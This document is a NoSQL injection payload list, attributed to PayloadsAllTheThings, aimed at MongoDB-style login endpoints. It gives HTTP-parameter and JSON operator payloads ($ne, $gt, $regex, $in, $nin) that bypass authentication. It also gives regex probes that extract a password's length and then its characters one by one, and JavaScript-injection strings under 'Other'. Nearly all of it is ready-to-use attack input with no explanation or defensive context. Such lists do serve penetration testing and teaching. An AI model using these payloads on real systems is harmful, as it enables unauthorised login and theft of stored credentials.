Authentication Bypass
---------------------

HTTP data
----------
username[$ne]=toto&password[$ne]=toto
login[$regex]=a.*&pass[$ne]=lol
login[$gt]=admin&login[$lt]=test&pass[$ne]=1
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto


JSON data
----------
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}


Extract Length Information
--------------------------
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}


Extract Data Information
--------------------------

HTTP data
---------
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp

username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*


JSON data
---------
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}


Extract data with "$in" query operator
---------------------------------------
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}


Other
-----
{"$regex":"wien.*"}
test'||1||'
test'&&1&&'
test' && this.password[0]=='a
test' && this.password.length < 30

(Note: Payloads from PayloadsAllTheThings)
